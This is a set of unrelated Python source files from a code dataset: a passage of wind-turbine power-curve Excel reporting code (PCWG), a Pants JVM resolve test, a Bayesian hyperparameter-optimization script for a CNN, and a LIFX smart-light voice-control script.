datasetConfig.rewsDefined: sh.write(row, labelColumn, "Profile Levels", self.bold_style) row += 1 sh.write(row, labelColumn, "Height", self.bold_style) sh.write(row, dataColumn, "Speed", self.bold_style) sh.write(row, dataColumn + 1, "Direction", self.bold_style) row += 1 for height in sorted(datasetConfig.data.windSpeedLevels): sh.write(row, labelColumn, height) sh.write(row, dataColumn, datasetConfig.data.windSpeedLevels[height]) if hasattr(datasetConfig.data, 'windDirectionLevels'): # we are not using this in REWS yet if height in datasetConfig.data.windDirectionLevels: sh.write(row, dataColumn + 1, datasetConfig.data.windDirectionLevels[height]) row += 1 sh.write(row, labelColumn, "Filters", self.bold_style) row += 1 sh.write(row, labelColumn, "Data Column", self.bold_style) sh.write(row, dataColumn, "Filter Type", self.bold_style) sh.write(row, dataColumn + 1, "Inclusive", self.bold_style) sh.write(row, dataColumn + 2, "Filter Value", self.bold_style) sh.write(row, dataColumn + 3, "Active", self.bold_style) row += 1 for filter in datasetConfig.filters: if isinstance(Filter,TimeOfDayFilter): sh.write(row, labelColumn, "Time Of Day Filter") sh.write(row, dataColumn, str(filter.startTime)) sh.write(row, dataColumn + 1, str(filter.endTime)) sh.write(row, dataColumn + 2, str(filter.daysOfTheWeek)) sh.write(row, dataColumn + 3, str(filter.months)) else: sh.write(row, labelColumn, filter.column) sh.write(row, dataColumn, filter.filterType) sh.write(row, dataColumn + 1, filter.inclusive) sh.write(row, dataColumn + 2, str(filter)) sh.write(row, dataColumn + 3, "True") # always true if in list... row += 1 def writeShear(self,sh,labelColumn,dataColumn,row,shearList,prefix=""): i = 0 for sh_meas in shearList: sh.write(row, labelColumn, prefix+"Shear Measurement " + str(i+1), self.bold_style) sh.write(row, dataColumn, sh_meas.wind_speed_column) row += 1 sh.write(row, labelColumn, prefix+"Shear Measurement {0} Height ".format(i+1), self.bold_style) sh.write(row, dataColumn, sh_meas.height) row += 1 i += 1 return row def reportPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve, analysis): powerCurveLevels = powerCurve.data_frame.copy() if powerCurve.wind_speed_column is None: powerCurveLevels['Specified Wind Speed'] = powerCurveLevels.index wind_speed_col = 'Specified Wind Speed' else: wind_speed_col = powerCurve.wind_speed_column powerCurveLevels = powerCurveLevels.sort(wind_speed_col) sh.write(rowOffset, columnOffset + 2, name, self.bold_style) sh.col(columnOffset + 1).width = 256 * 15 sh.col(columnOffset + 2).width = 256 * 15 sh.col(columnOffset + 3).width = 256 * 15 if powerCurve.wind_speed_column is None: sh.col(columnOffset + 5).width = 256 * 5 else: sh.col(columnOffset + 4).width = 256 * 15 sh.col(columnOffset + 5).width = 256 * 5 rowOrders = {'Data Count': 4, analysis.actualPower: 2, analysis.hubTurbulence: 3, analysis.baseline.wind_speed_column: 1, 'Specified Power': 2, 'Specified Turbulence': 3, 'Specified Wind Speed': 1, analysis.measuredTurbulencePower:2, wind_speed_col: 1} styles = {'Data Count': self.no_dp_style, analysis.baseline.wind_speed_column: self.two_dp_style, analysis.actualPower: self.no_dp_style, analysis.hubTurbulence: self.percent_no_dp_style, 'Specified Power': self.no_dp_style, 'Specified Turbulence': self.percent_no_dp_style, 'Specified Wind Speed': self.two_dp_style, analysis.measuredTurbulencePower: self.no_dp_style, wind_speed_col: self.two_dp_style} for colname in powerCurveLevels.columns: if colname in styles.keys(): sh.write(rowOffset + 1, columnOffset + rowOrders[colname], colname, self.bold_style) countRow = 1 for windSpeed in powerCurveLevels.index: for colname in powerCurveLevels.columns: if colname in styles.keys(): val = powerCurveLevels[colname][windSpeed] if type(val) is np.int64: #xlwt needs numbers to be recognisable as integers or floats; isinstance(np.int64(1), int) returns False. #Other numpy types (int32, float64, etc) are recognised as int and float appropriately. val = int(val) sh.write(rowOffset + countRow + 1, columnOffset + rowOrders[colname], val, styles[colname]) countRow += 1 if hasattr(powerCurve, 'zeroTurbulencePowerCurve'): countRow += 3 try: pc = powerCurve.zeroTurbulencePowerCurve.dfPowerLevels sh.write(rowOffset + countRow, columnOffset + 2, name + ' Zero TI Power Curve', self.bold_style) countRow += 1 sh.write(rowOffset + countRow, columnOffset + 1, 'Wind Speed', self.bold_style) sh.write(rowOffset + countRow, columnOffset + 2, 'Power', self.bold_style) for ws in pc.index: sh.write(rowOffset + countRow + 1, columnOffset + 1, ws, styles['Specified Wind Speed']) sh.write(rowOffset + countRow + 1, columnOffset + 2, pc.loc[ws, 'Power'], styles['Specified Wind Speed']) countRow += 1 except: sh.write(rowOffset + countRow, columnOffset + 2,'Zero TI Power Curve not calculated successfully for %s power curve.' % name) countRow+=1 else: countRow += 3 Status.add("Not reporting zero TI power curve for %s as it is not defined." % (name), verbosity=2) sh.write(rowOffset + countRow, columnOffset + 2,"Not reporting zero TI power curve for %s as it is not defined." % (name)) countRow+=1 return countRow def reportInterpolatedPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve, levels): sh.write(rowOffset, columnOffset + 2, name, self.bold_style) sh.write(rowOffset + 1, columnOffset + 1, "Wind Speed", self.bold_style) sh.write(rowOffset + 1, columnOffset + 2, "Power", self.bold_style) sh.write(rowOffset + 1, columnOffset + 3, "Turbulence", self.bold_style) count = 1 for windSpeed in sorted(levels): sh.write(rowOffset + count + 1, columnOffset + 1, windSpeed, self.two_dp_style) sh.write(rowOffset + count + 1, columnOffset + 2, float(powerCurve.power_function(windSpeed)), self.no_dp_style) sh.write(rowOffset + count + 1, columnOffset + 3, float(powerCurve.turbulence_function(windSpeed)), self.percent_no_dp_style) count += 1 def reportPowerDeviations(self, book, sheetName, powerDeviations, gradient): sheet = PowerDeviationMatrixSheet(self.calculated_power_deviation_matrix_dimensions) sheet.report(book, sheetName, powerDeviations, gradient) def report_aep(self,sh,analysis): sh # get tables in PP report form # Summary of EY acceptance test results: hrsMultiplier = (analysis.timeStepInSeconds/3600.0) row = 2 tall_style = xlwt.easyxf('font:height 360;') # 18pt first_row = sh.row(row) first_row.set_style(tall_style) sh.write(row,2, "Reference Turbine", self.bold_style) sh.write(row,3, "Measured (LCB) Pct of Warranted Annual Energy Yield (%)", self.bold_style) sh.write(row,4, "Extrapolated Pct of Warranted Annual Energy Yield (%)", self.bold_style) sh.write(row,5, "Last Complete Bin (LCB)", self.bold_style) sh.write(row,6, "Direction Sectors Analysed (degrees)", self.bold_style) sh.write(row,7, "Measured Hours", self.bold_style) #sh.write(row,8, "Annual Energy Yield Uncertainty as a percentage of the Warranted Annual Yield (%)", self.bold_style) row += 1 sh.write(row,2, analysis.Name) sh.write(row,3, analysis.aepCalcLCB.AEP*100, self.two_dp_style) sh.write(row,4, analysis.aepCalc.AEP*100, self.two_dp_style) sh.write(row,5, analysis.aepCalcLCB.lcb, self.two_dp_style) sh.write(row,6, "{mi} - {ma}".format(mi=analysis.dataFrame[analysis.windDirection].min(),ma=analysis.dataFrame[analysis.windDirection].max())) timeCovered = analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount].sum() * hrsMultiplier sh.write(row,7, timeCovered, self.two_dp_style) #sh.write(row,8, "NOT YET CALCULATED") row += 3 if hasattr(analysis.specified_power_curve,"referenceDensity"): sh.write_merge(row,row,2,6, "Measured Power Curve\n Reference Air Density = {ref} kg/m^3".format(ref=analysis.specified_power_curve.referenceDensity), self.bold_style) #sh.write(row,7, "Category A Uncertainty", self.bold_style) #sh.write(row,8, "Category B Uncertainty", self.bold_style) #sh.write(row,9, "Category C Uncertainty", self.bold_style) row += 1 sh.write(row,2, "Bin No", self.bold_style) sh.write(row,3, "Bin Centre Wind Speed", self.bold_style) sh.write(row,4, "Hub Height Wind Speed", self.bold_style) sh.write(row,5, "Power Output", self.bold_style) sh.write(row,6, "Cp", self.bold_style) sh.write(row,7, "Qty 10-Min Data", self.bold_style) sh.write(row,8, "Standard Deviation", self.bold_style) #sh.write(row,7, "Standard Uncertainty", self.bold_style) #sh.write(row,8, "Standard Uncertainty", self.bold_style) #sh.write(row,9, "Standard Uncertainty", self.bold_style) row += 1 sh.write(row,2, "I", self.bold_style) sh.write(row,3, "Vi_centre", self.bold_style) sh.write(row,4, "Vi", self.bold_style) sh.write(row,5, "Pi", self.bold_style) sh.write(row,7, "Ni", self.bold_style) sh.write(row,8, "StDev i", self.bold_style) #sh.write(row,7, "si", self.bold_style) #sh.write(row,8, "ui", self.bold_style) #sh.write(row,9, "uc,I", self.bold_style) row += 1 sh.write(row,3, "[m/s]", self.bold_style) sh.write(row,4, "[kW]", self.bold_style) sh.write(row,8, "[kW]", self.bold_style) #sh.write(row,7, "[kW]", self.bold_style) #sh.write(row,8, "[kW]", self.bold_style) #sh.write(row,9, "[kW]", self.bold_style) for binNo,ws in enumerate(analysis.allMeasuredPowerCurve.data_frame.index): if ws <= analysis.aepCalcLCB.lcb and analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount][ws] > 0: row+=1 sh.write(row,2, binNo+1, self.no_dp_style) sh.write(row,3, ws, self.one_dp_style) sh.write(row,4, analysis.allMeasuredPowerCurve.data_frame[analysis.baseline.wind_speed_column][ws], self.two_dp_style) sh.write(row,5, analysis.allMeasuredPowerCurve.data_frame[analysis.actualPower][ws], self.two_dp_style) if analysis.powerCoeff in analysis.allMeasuredPowerCurve.data_frame.columns: sh.write(row,6, analysis.allMeasuredPowerCurve.data_frame[analysis.powerCoeff][ws], self.two_dp_style) else: sh.write(row,6, "-", self.no_dp_style) datCount = analysis.allMeasuredPowerCurve.data_frame[analysis.dataCount][ws] sh.write(row,7, datCount, self.no_dp_style) if analysis.powerStandDev in analysis.allMeasuredPowerCurve.data_frame.columns: sh.write(row,8, analysis.allMeasuredPowerCurve.data_frame[analysis.powerStandDev][ws]) else: sh.write(row,8, "-", self.no_dp_style) #sh.write(row,7, "-", self.no_dp_style) #sh.write(row,8, "~", self.no_dp_style) #sh.write(row,9, "-", self.no_dp_style) row+=2 sh.write_merge(row,row,2,5, "More than 180 hours of data:", self.bold_style) sh.write(row,6, "TRUE" if timeCovered > 180 else "FALSE") sh.write(row,7, "({0} Hours)".format(round(timeCovered,2)) , self.two_dp_style) row+=1 if hasattr(analysis,"windSpeedAt85pctX1pnt5"): sh.write_merge(row,row,2,5, "Largest WindSpeed > {0}:".format(round(analysis.windSpeedAt85pctX1pnt5,2)), self.bold_style) sh.write(row,6, "TRUE" if analysis.aepCalcLCB.lcb > analysis.windSpeedAt85pctX1pnt5 else "FALSE") sh.write(row,7, "Threshold is 1.5*([email protected]*RatedPower)") row+=1 sh.write_merge(row,row,2,5, "AEP Extrap. within 1% of AEP LCB:",self.bold_style) ans = abs(1-(analysis.aepCalc.AEP/analysis.aepCalcLCB.AEP)) < 0.01 sh.write(row,6, "TRUE" if ans else "FALSE") if not ans: sh.write(row,8, analysis.aepCalc.AEP) sh.write(row,9, analysis.aepCalcLCB.AEP) if analysis.turbRenormActive: row += 2 sh.write(row,3, "Turbulence Corrected Measured (LCB) Pct of Warranted Annual Energy Yield (%)", self.bold_style) sh.write(row,4, "Turbulence Corrected Extrapolated Pct of Warranted Annual Energy Yield (%)", self.bold_style) sh.write(row+1,3, analysis.turbCorrectedAepCalcLCB.AEP*100, self.two_dp_style) sh.write(row+1,4, analysis.turbCorrectedAepCalc.AEP*100, self.two_dp_style) row+=2 sh.write_merge(row,row,3,10,"AEP Distribution",self.bold_style) row+=1 sh.write_merge(row,row,3,6, "Reference", self.bold_style) sh.write_merge(row,row,7,10, "Measured", self.bold_style) row+=1 sh.write(row,2,"Wind Speed",self.bold_style) sh.write(row,3,'Reference Freq',self.bold_style) sh.write(row,4,'Reference Power',self.bold_style) sh.write(row,5,'Reference Power (Resampled)',self.bold_style) sh.write(row,6,"Reference Energy",self.bold_style) sh.write(row,7,'Measured Freq',self.bold_style) sh.write(row,8,'Measured Power',self.bold_style) sh.write(row,9,'Measured Power (Resampled)',self.bold_style) sh.write(row,10,"Measured Energy",self.bold_style) for binNum in analysis.aepCalc.energy_distribution.index: row+=1 sh.write(row,2,binNum,self.two_dp_style) sh.write(row,3,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Freq"] ,self.four_dp_style) sh.write(row,4,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Upper"] ,self.four_dp_style) sh.write(row,5,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Power"] ,self.four_dp_style) sh.write(row,6,analysis.aepCalc.energy_distribution.loc[binNum,"Reference_Energy"] ,self.four_dp_style) sh.write(row,7,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Freq"] ,self.four_dp_style) sh.write(row,8,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Upper"] ,self.four_dp_style) sh.write(row,9,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Power"] ,self.four_dp_style) sh.write(row,10,analysis.aepCalc.energy_distribution.loc[binNum,"Measured_Energy"] ,self.four_dp_style) row+=3 def write_power_curves(self): Status.add("Wind Speed\tSpecified\tInner\tOuter\tAll", verbosity=2) for i in range(self.windSpeedBins.numberOfBins): windSpeed = self.windSpeedBins.binCenterByIndex(i) text = "%0.4f\t" % windSpeed if windSpeed in self.specified_power_curve.data_frame: text += "%0.4f\t" % self.specified_power_curve.data_frame[windSpeed] else: text += "\t" if windSpeed in self.innerMeasuredPowerCurve.data_frame: text += "%0.4f\t" % self.innerMeasuredPowerCurve.data_frame[windSpeed] else: text += "\t" if windSpeed in self.outerMeasuredPowerCurve.data_frame: text += "%0.4f\t" % self.outerMeasuredPowerCurve.data_frame[windSpeed] else: text += "\t" if windSpeed in self.allMeasuredPowerCurve.data_frame: text += "%0.4f\t" % self.allMeasuredPowerCurve.data_frame[windSpeed] else: text += "\t" Status.add(text, verbosity=2) def write_power_deviation_matrix(self): for j in reversed(range(self.turbulenceBins.numberOfBins)): turbulence = self.turbulenceBins.binCenterByIndex(j) text = "%f\t" % turbulence for i in range(self.windSpeedBins.numberOfBins): windSpeed = self.windSpeedBins.binCenterByIndex(i) if windSpeed in self.powerDeviations: if turbulence in self.powerDeviations[windSpeed]: text += "%f\t" % self.powerDeviations[windSpeed][turbulence] else: text += "\t" else: text += "\t" Status.add(text, verbosity=2) text = "\t" for i in range(self.windSpeedBins.numberOfBins): text += "%f\t" % self.windSpeedBins.binCenterByIndex(i) Status.add(text, verbosity=2) def report_scatter_metric(self,sh,analysis,row, turbRenormActive): row += 5 sh.write(row, 1, "Scatter Metric Before TI Renormalisation:", self.bold_style) sh.write(row+1, 1, analysis.powerCurveScatterMetric, self.percent_style) if turbRenormActive: sh.write(row, 2, "Scatter Metric After TI Renormalisation:", self.bold_style) sh.write(row+1, 2, analysis.powerCurveScatterMetricAfterTiRenorm , self.percent_style) return row + 3 class AnonReport(Report): def __init__(self,targetPowerCurve,wind_bins, turbulence_bins, version="unknown"): self.version = version self.targetPowerCurve = targetPowerCurve self.turbulenceBins = turbulence_bins self.normalisedWindSpeedBins = wind_bins def report(self, path, analysis, powerDeviationMatrix = True, scatterMetric=True): self.analysis = analysis book = xlwt.Workbook() sh = book.add_sheet("Anonymous Report", cell_overwrite_ok=True) sh.write(0, 0, "PCWG Tool Version Number:") sh.write(0, 1, self.version) sh.write(0, 2, xlwt.Formula('HYPERLINK("http://www.pcwg.org";"PCWG Website")')) row = 1 if powerDeviationMatrix: row = self.report_power_deviation_matrix(sh,analysis,book) if scatterMetric: row = self.report_scatter_metric(sh,analysis,row, analysis.turbRenormActive) book.save(path) def report_power_deviation_matrix(self,sh,analysis,book): gradient = colour.ColourGradient(-0.1, 0.1, 0.01, book) pcStart = 2 pcEnd = pcStart + self.normalisedWindSpeedBins.numberOfBins + 5 deviationMatrixStart = pcEnd + 5 row= [] row.append( self.reportPowerCurve(sh, pcStart, 0, self.targetPowerCurve.name + ' Power Curve', self.targetPowerCurve) ) row.append( self.reportPowerDeviations(sh,deviationMatrixStart, analysis.normalisedHubPowerDeviations, gradient, "Hub Power")) if analysis.normalisedTurbPowerDeviations != None: deviationMatrixStart += (self.turbulenceBins.numberOfBins + 5) * 2 row.append(self.reportPowerDeviations(sh,deviationMatrixStart, analysis.normalisedTurbPowerDeviations, gradient, "Turb Corrected Power") ) return max(row) def reportPowerDeviations(self,sh, startRow, powerDeviations, gradient, name): countShift = self.turbulenceBins.numberOfBins + 5 sh.write(startRow, 1, "Deviations Matrix (%s)" % name, self.bold_style) sh.write(startRow + countShift, 1, "Data Count Matrix (%s)" % name, self.bold_style) for j in range(self.turbulenceBins.numberOfBins): turbulence = self.turbulenceBins.binCenterByIndex(j) row = startRow + self.turbulenceBins.numberOfBins - j countRow = row + countShift sh.write(row, 0, turbulence, self.percent_no_dp_style) sh.write(countRow, 0, turbulence, self.percent_no_dp_style) for i in range(self.normalisedWindSpeedBins.numberOfBins): windSpeed = self.normalisedWindSpeedBins.binCenterByIndex(i) col = i + 1 if j == 0: sh.write(row + 1, col, windSpeed, self.two_dp_style) sh.write(countRow + 1, col, windSpeed, self.two_dp_style) if windSpeed in powerDeviations.matrix: if turbulence in powerDeviations.matrix[windSpeed]: deviation = powerDeviations.matrix[windSpeed][turbulence] count = int(powerDeviations.count[windSpeed][turbulence]) if not np.isnan(deviation): sh.write(row, col, deviation, gradient.getStyle(deviation)) sh.write(countRow, col, count, self.no_dp_style) return startRow + self.turbulenceBins.numberOfBins + countShift def reportPowerCurve(self, sh, rowOffset, columnOffset, name, powerCurve): sh.write(rowOffset, columnOffset + 2, name, self.bold_style) rowOrders = { 'Data Count':4, 'Normalised Wind Speed':1,'Normalised Power':2, 'Turbulence':3} for colname in rowOrders.keys(): sh.write(rowOffset + 1, columnOffset + rowOrders[colname], colname, self.bold_style) countRow = 1 for i in range(self.normalisedWindSpeedBins.numberOfBins): windSpeed = self.normalisedWindSpeedBins.binCenterByIndex(i) mask = self.analysis.dataFrame['Normalised WS Bin'] == windSpeed dataCount = self.analysis.dataFrame[mask]['Normalised WS Bin'].count() absoluteWindSpeed = windSpeed * self.analysis.observedRatedWindSpeed sh.write(rowOffset + countRow + 1, columnOffset + 1, windSpeed, self.two_dp_style) sh.write(rowOffset + countRow + 1, columnOffset + 4, dataCount, self.no_dp_style) if dataCount > 0: sh.write(rowOffset + countRow + 1, columnOffset + 2, float(powerCurve.powerFunction(absoluteWindSpeed))/self.analysis.observedRatedPower, self.two_dp_style) sh.write(rowOffset + countRow + 1, columnOffset + 3, float(powerCurve.turbulenceFunction(absoluteWindSpeed)), self.percent_no_dp_style) countRow += 1 return countRow
PCWG/PCWG
pcwg/reporting/reporting.py
reporting.py
py
47,780
python
en
code
23
github-code
6
26043118086
from __future__ import annotations from textwrap import dedent import pytest from pants.backend.java.target_types import JavaSourcesGeneratorTarget from pants.backend.java.target_types import rules as target_types_rules from pants.core.util_rules import config_files, source_files from pants.engine.addresses import Address, Addresses from pants.jvm.resolve.common import Coordinate from pants.jvm.resolve.coursier_fetch import NoCompatibleResolve from pants.jvm.resolve.coursier_fetch import rules as coursier_fetch_rules from pants.jvm.resolve.key import CoursierResolveKey from pants.jvm.target_types import DeployJarTarget, JvmArtifactTarget from pants.jvm.testutil import maybe_skip_jdk_test from pants.jvm.util_rules import rules as util_rules from pants.testutil.rule_runner import PYTHON_BOOTSTRAP_ENV, QueryRule, RuleRunner, engine_error NAMED_RESOLVE_OPTIONS = ( '--jvm-resolves={"one": "coursier_resolve.lockfile", "two": "coursier_resolve.lockfile"}' ) DEFAULT_RESOLVE_OPTION = "--jvm-default-resolve=one" @pytest.fixture def rule_runner() -> RuleRunner: rule_runner = RuleRunner( rules=[ *config_files.rules(), *coursier_fetch_rules(), *source_files.rules(), *util_rules(), *target_types_rules(), QueryRule(CoursierResolveKey, (Addresses,)), ], target_types=[DeployJarTarget, JavaSourcesGeneratorTarget, JvmArtifactTarget], ) rule_runner.set_options( args=[ NAMED_RESOLVE_OPTIONS, DEFAULT_RESOLVE_OPTION, ], env_inherit=PYTHON_BOOTSTRAP_ENV, ) return rule_runner def assert_resolve( expected_resolve: str, rule_runner: RuleRunner, root_one_resolve: str, root_two_resolve: str, leaf_resolve: str, ) -> None: rule_runner.write_files( { "BUILD": dedent( f"""\ deploy_jar(name='root_one', main='Ex', dependencies=[':leaf'], resolve='{root_one_resolve}') deploy_jar(name='root_two', main='Ex', dependencies=[':leaf'], resolve='{root_two_resolve}') jvm_artifact( name='leaf', group='ex', artifact='ex', version='0.0.0', resolve='{leaf_resolve}', ) """ ), "coursier_resolve.lockfile": "[]", } ) resolve_key = rule_runner.request( CoursierResolveKey, # NB: Although it will not happen for `deploy_jars` in production, we resolve two of them # together here to validate the handling of multiple roots, which _can_ happen for things # like the `repl` goal, and other goals which create an adhoc merged Classpath. [ Addresses( [ Address(spec_path="", target_name="root_one"), Address(spec_path="", target_name="root_two"), ] ) ], ) assert resolve_key.name == expected_resolve @maybe_skip_jdk_test def test_all_matching(rule_runner: RuleRunner) -> None: assert_resolve("one", rule_runner, "one", "one", "one") @maybe_skip_jdk_test def test_no_matching_for_root(rule_runner: RuleRunner) -> None: with engine_error(NoCompatibleResolve): assert_resolve("n/a", rule_runner, "one", "two", "two") @maybe_skip_jdk_test def test_no_matching_for_leaf(rule_runner: RuleRunner) -> None: with engine_error(NoCompatibleResolve): assert_resolve("n/a", rule_runner, "one", "one", "two") @pytest.mark.parametrize( "coord_str,expected", ( ("group:artifact:version", Coordinate("group", "artifact", "version")), ( "group:artifact:packaging:version", Coordinate("group", "artifact", "version", "packaging"), ), ( "group:artifact:packaging:classifier:version", Coordinate("group", "artifact", "version", "packaging", "classifier"), ), ), ) def test_from_coord_str(coord_str: str, expected: Coordinate) -> None: assert Coordinate.from_coord_str(coord_str) == expected
pantsbuild/pants
src/python/pants/jvm/resolve/coursier_fetch_test.py
coursier_fetch_test.py
py
4,186
python
en
code
2,896
github-code
6
70321394427
import multiprocessing as mp from skopt import Optimizer from skopt.space import Real, Integer import subprocess import time import pickle from ID_CNN_V01 import setup_thread_environment from _utils.ID_utils import get_convolutions, Colors, check_available_gpus n_calls = 7 dim_learning_rate = Real(low=1e-7, high=3e-2, prior='log-uniform', name='learning_rate') dim_n_convolutions = Integer(low=1, high=3, name='n_convolutions') dim_dense_nodes = Integer(low=128, high=200, name='n_dense_nodes') class ParameterBatch: """ Class of Object containing all hyperparameters needed to run the network. """ def __init__(self, learning_rate=0.0005, input_shape=[480, 640, 1], batch_size=16, convolutions=[(64, 7, 7), (128, 5, 5)], gpu_id=2, n_dense_nodes=128, n_max_epochs=30, n_runs=1, training=True, train_csv_file="_data/hetzell_shearlet_training_data.csv", eval_csv_file="_data/hetzell_shearlet_evaluation_data.csv", test_csv_file="_data/hetzell_shearlet_testing_data.csv" ): self.learning_rate = learning_rate self.input_shape = input_shape self.batch_size = batch_size self.convolutions = convolutions self.gpu_id = gpu_id self.n_dense_nodes = n_dense_nodes self.n_max_epochs = n_max_epochs self.n_runs = n_runs self.training = training self.train_csv_file = train_csv_file self.test_csv_file = test_csv_file self.eval_csv_file = eval_csv_file def map_val_to_param_batch(vals, gpu_id): """ Maps the values given by an Optimizer into a ParameterBatch object. :param vals: list of values from Optimizer :param gpu_id: the gpu_id passed to the ParameterBatch :return: ParameterBatch object """ params = ParameterBatch(learning_rate=vals[0], convolutions=get_convolutions(vals[1]), n_dense_nodes=vals[2], gpu_id=gpu_id) return params def bayesian_optimize(n_calls=12): """ Apply bayesian optimization to a network. Access global variable reserved_gpus, Ask Optimizer for one point for each GPU, train and evaluate at that point in parallellized threads, repeat n_calls times. Then train and test the best setup. :return: --- """ start_time = time.time() p = mp.Pool(len(reserved_gpus)) optimizer = Optimizer(dimensions=[dim_learning_rate, dim_n_convolutions, dim_dense_nodes], random_state=1) for i in range(1, n_calls + 1): gpus = list(reserved_gpus) vals = optimizer.ask(n_points=len(reserved_gpus)) points = [] for point in vals: param_batch = map_val_to_param_batch(point, gpus.pop(0)) points.append(param_batch) loss = p.map(setup_thread_environment, points) optimizer.tell(vals, loss) print("#" * 100) print(Colors.OKBLUE, "Optimization cylce", i, "done.", Colors.ENDC) print("#" * 100) print("Best setup found:") p.close() print(min(optimizer.yi)) # print the best objective found sorted_sets = sorted(list(zip(optimizer.yi, optimizer.Xi)), key=lambda tup: tup[0]) print("BEST SET:", sorted_sets[0]) print("#" * 100) print(Colors.OKBLUE, "Starting Testing of Best Set.", Colors.ENDC) print("#" * 100) gpus = list(reserved_gpus) test_args = map_val_to_param_batch(sorted_sets[0][1], gpus.pop(0)) test_args.training = False avg_test_accuracy = setup_thread_environment(test_args) print("Test accuracy:", avg_test_accuracy) end_time = time.time() print("It took:", str(end_time - start_time), "seconds") pickle.dump(sorted_sets, open("_logs/optimizer_points.pkl", "wb")) try: file_path = "_logs/dl_optimizer_result.txt" label_file = open(file_path, "w") label_file.write("Best setup found:\n") label_file.write(str(sorted_sets[0])) label_file.write("\nTime to process: ") label_file.write(str(end_time - start_time)) label_file.write("\nTest Accuracy: ") label_file.write(str(avg_test_accuracy)) finally: label_file.close() def main(): """ clears the logdir, finds the reserved_gpus and starts the bayesian optimization. :return: --- """ global reserved_gpus command_str = "(rm -r _logs)" subprocess.run(command_str, shell=True) reserved_gpus = check_available_gpus() print("GPUs", reserved_gpus, "are available.") bayesian_optimize(n_calls=n_calls) if __name__ == "__main__": main()
lorenz-h/DataRepresentationLearning
Old Experiments/ImitationDuckie_V1/_old_versions/ID_Optimizer.py
ID_Optimizer.py
py
4,792
python
en
code
0
github-code
6
22176331977
import networkx as nx from networkx.algorithms import community from nltk.corpus import stopwords import re def build_graph(text): word_list = [] G = nx.Graph() for line in text: line = (line.strip()).split() for i, word in enumerate(line): if i != len(line)-1: word_a = word word_b = line[i+1] if word_a not in word_list: word_list.append(word_a) if word_b not in word_list: word_list.append(word_b) if G.has_edge(word_a,word_b): G[word_a][word_b]['weight'] += 1 else: G.add_edge(word_a,word_b, weight = 1) return G def calculate_central_nodes(text_network): bc = (nx.betweenness_centrality(text_network,weight='weight')) nx.set_node_attributes(text_network, bc, 'betweenness') bc_threshold = sorted(bc.values(), reverse=True)[20] to_keep = [n for n in bc if bc[n] > bc_threshold] filtered_network = text_network.subgraph(to_keep) return filtered_network def create_and_assign_communities(text_network): communities_generator = community.girvan_newman(text_network) top_level_communities = next(communities_generator) next_level_communities = next(communities_generator) return next_level_communities def find_topics(text): try: text_network = build_graph(text) text_network = calculate_central_nodes(text_network) topics = create_and_assign_communities(text_network) return topics except: print("Error: Something went wrong. Check your input. You need at least 20 unique words in your text to start the analysis.") def clean(text): new_text = [] no_punct = [re.sub(r'[^\w\s]','',x) for x in text] stop_words = set(stopwords.words('english')) for line in no_punct: new_line = ([item.lower() for item in line.split() if not item.lower() in stop_words]) new_text.append(' '.join((new_line))) return new_text
michal-pikusa/topic-network
topicnetwork/__init__.py
__init__.py
py
2,066
python
en
code
1
github-code
6
70820187389
from lifxlan import * import subprocess import random lights_name = { "lit" : "Lit_haut", "couloir" : "Couloir", "wc" : "Wc", "cuisine" : "Cuisine" } colors = { "rouge" : [65535, 65535, 65535, 3500], "orange" : [5525, 65535, 65535, 3500], "jaune" : [7000, 65535, 65535, 3500], "vert" : [16173, 65535, 65535, 3500], "cyan" : [29814, 65535, 65535, 3500], "bleu" : [43634, 65535, 65535, 3500], "violet" : [50486, 65535, 65535, 3500], "rose" : [58275, 65535, 47142, 3500], "blanc" : [58275, 0, 65535, 5500], "blanc froid" : [58275, 0, 65535, 9000], "blanc chaud" : [58275, 0, 65535, 3200], "or" : [58275, 0, 65535, 2500], "aleatoire" : 1 } light=None power_level=None color=None lan = LifxLAN(None) _lights = lan.get_lights() lights = {} for l in _lights: lights[l.get_label()] = l def command(light, color, power_level): if color is not None and power_level is not None: color = set_power(color, power_level) if light is not None: if color is None and power_level is not None: color = set_power(light.get_color(), power_level) elif color is not None and power_level is None: color = set_power(color, light.get_power()) elif color is None and power_level is None: color = set_power(None, 100) light.set_color(color, duration=0.2, rapid=False) def set_power(color, power_level): if color == None: color = [58275, 0, 0, 9000] if type(color) is not list: color = list(color) if power_level <= 100: color[2] = 65535 * power_level / 100 else: color[2] = power_level return color def jarvis_say(rules): color = None says = "J\'allume la lumiere " if "light" in rules: says += " de la %s " % rules["light"] if "color" in rules: if rules["color"] == "aleatoire": color = colors.keys()[random.randint(0, len(colors) - 1)] says += " avec une couleur aleatoire qui sera %s" % color color = colors[color] else: says += " en %s " % rules["color"] if "power" in rules: if rules["power"] == "0": says = says.replace("J\'allume", "J\'eteint") lan.set_power_all_lights("off", rapid=True) else: lan.set_power_all_lights("on", rapid=True) says += " avec une intensite de %s pourcents" % rules["power"] p = subprocess.Popen(['/etc/script/jarvis/jarvis.sh', '-s', says], stdout=subprocess.PIPE, stderr=subprocess.PIPE) out, err = p.communicate() return color def parse_arg(args): light = None color = None power_level = None rules = {} for i, arg in enumerate(args): if i + 1 < len(args) and arg + " " + args[i + 1] in lights_name: light = lights[arg + " " + args[i + 1]] rules["light"] = arg + " " + args[i + 1] elif arg in lights_name: rules["light"] = arg light = lights[lights_name[arg]] elif i + 1 < len(args) and arg + " " + args[i + 1] in colors: rules["color"] = arg + " " + args[i + 1] color = colors[arg + " " + args[i + 1]] elif arg in colors: rules["color"] = arg color = colors[arg] else: try: power_level = int(arg) rules["power"] = arg except: pass tmp = jarvis_say(rules) if tmp != None: color = tmp return light, color, power_level light, color, power_level = parse_arg(sys.argv) if light is not None: command(light, color, power_level) else: for light_name in lights: command(lights[light_name], color, power_level)
devauxa/harriette
script/light.py
light.py
py
3,774
python
en
code
0
github-code
6
42162211409
